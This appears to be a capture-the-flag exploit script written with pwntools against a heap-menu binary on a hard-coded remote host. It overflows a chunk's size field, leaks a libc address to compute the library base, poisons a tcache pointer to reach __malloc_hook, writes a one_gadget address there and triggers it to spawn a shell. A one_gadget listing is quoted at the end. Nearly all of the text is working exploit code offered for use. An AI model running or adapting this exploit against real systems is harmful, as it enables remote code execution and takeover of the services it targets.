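from pwn import *

# Echo every byte sent and received on the connection. Helpful while
# developing, but very noisy; drop to 'info' once the interaction is stable.
context.log_level = 'debug'

# The target binary and the libc build it is paired with. The raw constants
# used further down (0x3ebca0 as the leak-to-base delta, 0x4f322 as a
# one_gadget address) presumably belong to this libc-2.27.so build — they
# must be re-derived for any other libc before this script is reused.
elf = ELF("./pwn")
libc = ELF("./libc-2.27.so")

# Hard-coded remote endpoint. The port is given as a string here; pwntools
# converts it, but an int is the conventional form.
p = remote("113.201.14.253", "14745")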
 
def add(size):
    """Select menu option 1 ("add") and submit *size* as the allocation size.

    Both sends use sendlineafter, so each one waits for the corresponding
    prompt from the remote process before writing. Uses the module-level
    tube ``p``.
    """
    menu_prompt = "Enter 1 to add, 2 to free, 3 to show, 4 to edit, 0 to exit:"
    p.sendlineafter(menu_prompt, b"1")
    size_text = str(size).encode()
    p.sendlineafter("Enter size to add:", size_text)
 
def show(idx):
    """Select menu option 3 ("show") for chunk index *idx*.

    Only drives the menu; reading the chunk contents the binary prints back
    is left to the caller. Uses the module-level tube ``p``.
    """
    menu_prompt = "Enter 1 to add, 2 to free, 3 to show, 4 to edit, 0 to exit:"
    index_text = str(idx).encode()
    p.sendlineafter(menu_prompt, b"3")
    p.sendlineafter("Enter index to show:", index_text)
 
def edit(idx, size, con):
    """Select menu option 4 ("edit") and write *con* into chunk index *idx*.

    *idx* and *size* are converted to ASCII digits; *con* is passed through
    unchanged, so callers supply bytes. Note that *size* is whatever the
    caller asks for — this helper does not compare it with the size the chunk
    was allocated with. Uses the module-level tube ``p``.
    """
    menu_prompt = "Enter 1 to add, 2 to free, 3 to show, 4 to edit, 0 to exit:"
    answers = (
        (menu_prompt, b"4"),
        ("Enter index to edit:", str(idx).encode()),
        ("input size", str(size).encode()),
        ("input", con),
    )
    for prompt, payload in answers:
        p.sendlineafter(prompt, payload)
 
def call_exit():
    """Select menu option 0 ("exit") on the module-level tube ``p``.

    Defined for completeness; nothing below calls it.
    """
    menu_prompt = "Enter 1 to add, 2 to free, 3 to show, 4 to edit, 0 to exit:"
    choice = b"0"
    p.sendlineafter(menu_prompt, choice)
 
# Interaction sequence with the remote process. Every helper below answers a
# menu prompt with sendlineafter, so the order of these calls is the protocol:
# reordering or skipping a line changes what the remote side receives.
add(0x68)

# Edit index 0 with a 0x70-byte write: 0x68 filler bytes, then the qword
# 0xd41. The write length exceeds the 0x68 requested for that chunk above by
# exactly the trailing qword.
edit(0,0x70,b'a'*0x68+p64(0xd41))

add(0xd50)

add(0xd10)
show(2)
p.recvuntil("Chunk at index 2: ")
# Six leaked bytes, zero-extended to a qword, minus a fixed delta. 0x3ebca0 is
# presumably the leak-to-base distance for the bundled libc-2.27.so —
# verify against that build before reusing.
libc_base=u64(p.recv(6).ljust(8,b'\x00'))-0x3ebca0
print("libc_base = ",hex(libc_base))
system=libc_base+libc.sym["system"]  # computed but not referenced below
free_hook=libc_base+libc.sym["__free_hook"]  # computed but not referenced below
malloc_hook=libc_base+libc.sym["__malloc_hook"]
# 0x4f322 is the second entry of the one_gadget listing quoted at the bottom
# of this file (constraint noted there: [rsp+0x40] == NULL).
ogg=libc_base+0x4f322


# Index 1 was allocated with 0xd50 above; both edits below write 0xd58 filler
# bytes followed by one or two qwords (0xd60 / 0xd68 bytes in total).
edit(1,0xd60,b'b'*0xd58+p64(0x2a1))

add(0x300)

edit(1,0xd68,b'b'*0xd58+p64(0x281)+p64(malloc_hook))

add(0x270)
add(0x270)
# Index 5 is taken to be the chunk from the second add(0x270) above (indices
# assumed to count up from 0 in add order — not shown by the binary itself);
# its first qword is set to ogg.
edit(5,0x8,p64(ogg))






add(0)

p.interactive()
 
 
'''
0x4f2c5 execve("/bin/sh", rsp+0x40, environ)
constraints:
rsp & 0xf == 0
rcx == NULL

0x4f322 execve("/bin/sh", rsp+0x40, environ)
constraints:
[rsp+0x40] == NULL

0x10a38c execve("/bin/sh", rsp+0x70, environ)
constraints:
[rsp+0x70] == NULL

'''
 